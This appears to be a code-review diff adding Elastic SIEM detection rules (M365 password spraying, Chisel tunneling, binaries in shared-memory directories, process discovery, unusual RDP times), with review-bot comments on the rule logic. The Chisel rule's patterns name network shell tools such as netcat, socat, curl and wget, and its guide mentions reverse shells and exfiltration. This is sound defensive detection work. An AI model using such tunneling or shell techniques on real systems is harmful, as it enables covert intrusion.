@@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a high number (25) of failed Microsoft 365 user authentication attempts from a single IP address within 30 minutes, which could be indicative of a password spraying attack. An adversary may attempt a password spraying attack to obtain unauthorized access to user accounts.", + "false_positives": [ + "Automated processes that attempt to authenticate using expired credentials and unbounded retries may lead to false positives." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Password Spraying of Microsoft 365 User Accounts", + "note": "", + "query": "event.dataset:o365.audit and event.provider:(Exchange or AzureActiveDirectory) and event.category:authentication and\nevent.action:(\"UserLoginFailed\" or \"PasswordLogonInitialAuthUsingPassword\")\n", + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "3efee4f0-182a-40a8-a835-102c68a4175d", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": 
"https://attack.mitre.org/techniques/T1110/" + } + ] + } + ], + "threshold": { + "field": [ + "source.ip" + ], + "value": 25 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 104 + }, + "id": "3efee4f0-182a-40a8-a835-102c68a4175d_104", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_106.json b/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_106.json new file mode 100644 index 00000000000..00bab701390 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_106.json 
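Review bot: The `threshold` here groups only on `source.ip` with `"value": 25` and counts every `UserLoginFailed`/`PasswordLogonInitialAuthUsingPassword` event, so 25 failures against one account from one IP is reported as "password spraying" while a spray spread across many source IPs never reaches the threshold. Threshold rules accept a `cardinality` clause; adding one on the account identity field, e.g. `"cardinality": [{"field": "user.id", "value": 10}]` (constructed values, field name to be confirmed against the o365.audit mapping), would tie the alert to many distinct targeted accounts, which is what separates spraying from single-account brute force. The `note` field is also an empty string, so a high-severity alert ships without any triage guidance, unlike the other rules in this change that carry a full `## Triage and analysis` guide. The _106 and _207 copies of this rule (the next two hunks) are identical apart from `version` and share both points.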
@@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a high number (25) of failed Microsoft 365 user authentication attempts from a single IP address within 30 minutes, which could be indicative of a password spraying attack. An adversary may attempt a password spraying attack to obtain unauthorized access to user accounts.", + "false_positives": [ + "Automated processes that attempt to authenticate using expired credentials and unbounded retries may lead to false positives." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Password Spraying of Microsoft 365 User Accounts", + "note": "", + "query": "event.dataset:o365.audit and event.provider:(Exchange or AzureActiveDirectory) and event.category:authentication and\nevent.action:(\"UserLoginFailed\" or \"PasswordLogonInitialAuthUsingPassword\")\n", + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "3efee4f0-182a-40a8-a835-102c68a4175d", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": 
"https://attack.mitre.org/techniques/T1110/" + } + ] + } + ], + "threshold": { + "field": [ + "source.ip" + ], + "value": 25 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 106 + }, + "id": "3efee4f0-182a-40a8-a835-102c68a4175d_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_207.json b/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_207.json new file mode 100644 index 00000000000..47d80390709 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3efee4f0-182a-40a8-a835-102c68a4175d_207.json 
@@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a high number (25) of failed Microsoft 365 user authentication attempts from a single IP address within 30 minutes, which could be indicative of a password spraying attack. An adversary may attempt a password spraying attack to obtain unauthorized access to user accounts.", + "false_positives": [ + "Automated processes that attempt to authenticate using expired credentials and unbounded retries may lead to false positives." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Password Spraying of Microsoft 365 User Accounts", + "note": "", + "query": "event.dataset:o365.audit and event.provider:(Exchange or AzureActiveDirectory) and event.category:authentication and\nevent.action:(\"UserLoginFailed\" or \"PasswordLogonInitialAuthUsingPassword\")\n", + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "3efee4f0-182a-40a8-a835-102c68a4175d", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": 
"https://attack.mitre.org/techniques/T1110/" + } + ] + } + ], + "threshold": { + "field": [ + "source.ip" + ], + "value": 25 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 207 + }, + "id": "3efee4f0-182a-40a8-a835-102c68a4175d_207", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_5.json b/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_5.json new file mode 100644 index 00000000000..58320c817f2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_5.json 
@@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for common command line flags leveraged by the Chisel client utility followed by a connection attempt. Chisel is a command-line utility used for creating and managing TCP and UDP tunnels, enabling port forwarding and secure communication between machines. Attackers can abuse the Chisel utility to establish covert communication channels, bypass network restrictions, and carry out malicious activities by creating tunnels that allow unauthorized access to internal systems.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Protocol Tunneling via Chisel Client", + "note": "## Triage and analysis\n\n### Investigating Potential Protocol Tunneling via Chisel Client\n\nAttackers can leverage `chisel` to clandestinely tunnel network communications and evade security measures, potentially gaining unauthorized access to sensitive systems.\n\nThis rule looks for a sequence of command line arguments that are consistent with `chisel` client tunneling behavior, followed by a network event by an uncommon process. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate protocol tunneling. This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- Potential Protocol Tunneling via Chisel Server - ac8805f6-1e08-406c-962e-3937057fa86f\n- Potential Linux Tunneling and/or Port Forwarding - 6ee947e9-de7e-4281-a55d-09289bdf947e\n- Potential Protocol Tunneling via EarthWorm - 9f1c4ca3-44b5-481d-ba42-32dc215a2769\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator or developer who uses port tunneling for benign purposes, consider adding exceptions for specific user accounts or hosts. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n process.args == \"client\" and process.args : (\"R*\", \"*:*\", \"*socks*\", \"*.*\") and process.args_count >= 4 and \n process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", \"rpm\", \"dnf\", \"ssh\", \"sshd\")]\n", + "references": [ + "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform", + "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": 
"keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "3f12325a-4cc6-410b-8d4c-9fbbeb744cfd", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "type": "eql", + "version": 5 + }, + "id": "3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_110.json b/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_110.json new file mode 100644 index 00000000000..ab13094f8fb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_110.json 
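Review bot: `"telnet"` appears twice in the `not process.name : (...)` exclusion list of the network event (`... "java", "telnet",` then `"ftp", ...` on the next line); the duplicate is harmless but the list should be deduplicated. In the process event, the `"*.*"` alternative in `process.args : ("R*", "*:*", "*socks*", "*.*")` matches any argument containing a dot (hostnames, addresses, paths), so in practice the selectivity comes from `process.args == "client"`, `process.args_count >= 4` and the shell-parent check; worth confirming that breadth is intended and, if so, saying so in the `note`. This rule also has no `timestamp_override` while most sibling rules in this change set `"timestamp_override": "event.ingested"`.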
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a binary by root in Linux shared memory directories: (/dev/shm/, /run/shm/, /var/run/, /var/lock/). This activity is to be considered highly abnormal and should be investigated. Threat actors have placed executables used for persistence on high-uptime servers in these directories as system backdoors.", + "false_positives": [ + "Directories /dev/shm and /run/shm are temporary file storage directories in Linux. They are intended to appear as a mounted file system, but uses virtual memory instead of a persistent storage device and thus are used for mounting file systems in legitimate purposes." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Binary Executed from Shared Memory Directory", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and\nuser.id == \"0\" and process.executable : (\"/dev/shm/*\", \"/run/shm/*\", \"/var/run/*\", \"/var/lock/*\") and\nnot process.executable : (\"/var/run/docker/*\", \"/var/run/utsns/*\", \"/var/run/s6/*\", \"/var/run/cloudera-scm-agent/*\", \n\"/var/run/argo/argoexec\") and not process.parent.command_line : \"/usr/bin/runc init\"\n", + "references": [ + "https://linuxsecurity.com/features/fileless-malware-on-linux", + "https://twitter.com/GossiTheDog/status/1522964028284411907", + "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + 
"ecs": true, + "name": "process.parent.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "3f3f9fe2-d095-11ec-95dc-f661ea17fbce", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Threat: BPFDoor", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "3f3f9fe2-d095-11ec-95dc-f661ea17fbce_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_3.json b/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_3.json new file mode 100644 index 00000000000..a9668233e62 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_3.json 
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of built-in tools attackers can use to discover running processes on an endpoint.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Process Discovery via Built-In Applications", + "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and process.name in (\n \"ps\", \"pstree\", \"htop\", \"pgrep\"\n) and \nnot process.parent.name in (\"amazon-ssm-agent\", \"snap\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "3f4d7734-2151-4481-b394-09d7c6c91f75", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + }, + { + "id": "T1518", + "name": "Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/", + "subtechnique": [ + { + "id": "T1518.001", + "name": "Security Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/001/" + } + ] + } + ] + } + ], + "timestamp_override": 
"event.ingested", + "type": "eql", + "version": 3 + }, + "id": "3f4d7734-2151-4481-b394-09d7c6c91f75_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3f4e2dba-828a-452a-af35-fe29c5e78969_3.json b/packages/security_detection_engine/kibana/security_rule/3f4e2dba-828a-452a-af35-fe29c5e78969_3.json new file mode 100644 index 00000000000..694071faabd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3f4e2dba-828a-452a-af35-fe29c5e78969_3.json 
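Review bot: The EQL in the `"query"` line has no `host.os.type` constraint even though the rule is tagged `OS: Linux` and `OS: macOS`, whereas the other rules in this commit pin the OS (`host.os.type == "windows"` in 403ef0d3, `host.os.type:linux` in 40ddbcc8); adding `host.os.type in ("linux", "macos")` to the `where` clause would keep the rule from being evaluated against Windows endpoint events in the same `logs-endpoint.events.*` indices. The carve-out `not process.parent.name in ("amazon-ssm-agent", "snap")` keys on the parent's name alone, which is a looser allowlist than a `process.parent.executable` path check; worth a second look given this is a building-block rule meant to feed other detections. The `index` list includes `endgame-*` but nothing in `related_integrations` or `required_fields` reflects a second data source, which is presumably intentional since Endgame is not a Fleet package.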
@@ -0,0 +1,61 @@ +{ + "attributes": { + "anomaly_threshold": 70, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected an RDP session started at an usual time or weekday. An RDP session at an unusual time could be followed by other suspicious activities, so catching this is a good first step in detecting a larger attack.", + "from": "now-12h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "lmd_unusual_time_weekday_rdp_session_start", + "name": "Unusual Time or Day for an RDP Session", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/lmd", + "https://www.elastic.co/blog/detecting-lateral-movement-activity-a-new-kibana-integration", + "https://www.elastic.co/blog/remote-desktop-protocol-connections-elastic-security" + ], + "related_integrations": [ + { + "package": "lmd", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 21, + "rule_id": "3f4e2dba-828a-452a-af35-fe29c5e78969", + "setup": "## Setup\n\nThe rule requires the Lateral Movement Detection integration assets to be installed, as well as file and Windows RDP process events collected by the Elastic Defend integration. \n\n### Lateral Movement Detection Setup\nThe Lateral Movement Detection integration detects lateral movement activity by identifying abnormalities in file and Windows RDP events. 
Anomalies are detected using Elastic's Anomaly Detection feature.\n\n#### Prerequisite Requirements:\n- Fleet is required for Lateral Movement Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows RDP process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Lateral Movement Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Lateral Movement Detection and select the integration to see more details about it.\n- Under Settings, click Install Lateral Movement Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Lateral Movement Detection, you'll need to enable the corresponding Anomaly Detection jobs.\n- Before enabling the Anomaly Detection jobs, confirm that the Pivot Transform asset is installed and actively gathering data in the destination index `ml-rdp-lmd`.\n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". 
Select the Data View containing your transformed RDP process data i.e.`ml-rdp-lmd`.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/lmd/kibana/ml_module/lmd-ml.json) configuration file, you will see a card for Lateral Movement Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Lateral Movement Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "3f4e2dba-828a-452a-af35-fe29c5e78969_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/40155ee4-1e6a-4e4d-a63b-e8ba16980cfb_3.json b/packages/security_detection_engine/kibana/security_rule/40155ee4-1e6a-4e4d-a63b-e8ba16980cfb_3.json new file mode 100644 index 00000000000..6275b7a1af5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/40155ee4-1e6a-4e4d-a63b-e8ba16980cfb_3.json 
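Review bot: The `"description"` line reads "an RDP session started at an usual time or weekday", which states the opposite of what the `lmd_unusual_time_weekday_rdp_session_start` job detects; it should read `"description": "A machine learning job has detected an RDP session started at an unusual time or weekday. ..."`. The `"setup"` text says the rule needs Windows RDP process events from Elastic Defend, yet the tags carry no `OS: Windows` or `Domain: Endpoint` entry, unlike the 40155ee4 rules in this same commit; if that omission is not deliberate the two rules should be tagged consistently. The duplicated `Rule Type: ML` / `Rule Type: Machine Learning` tags appear in 40155ee4 as well, so I assume that pair is intentional.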
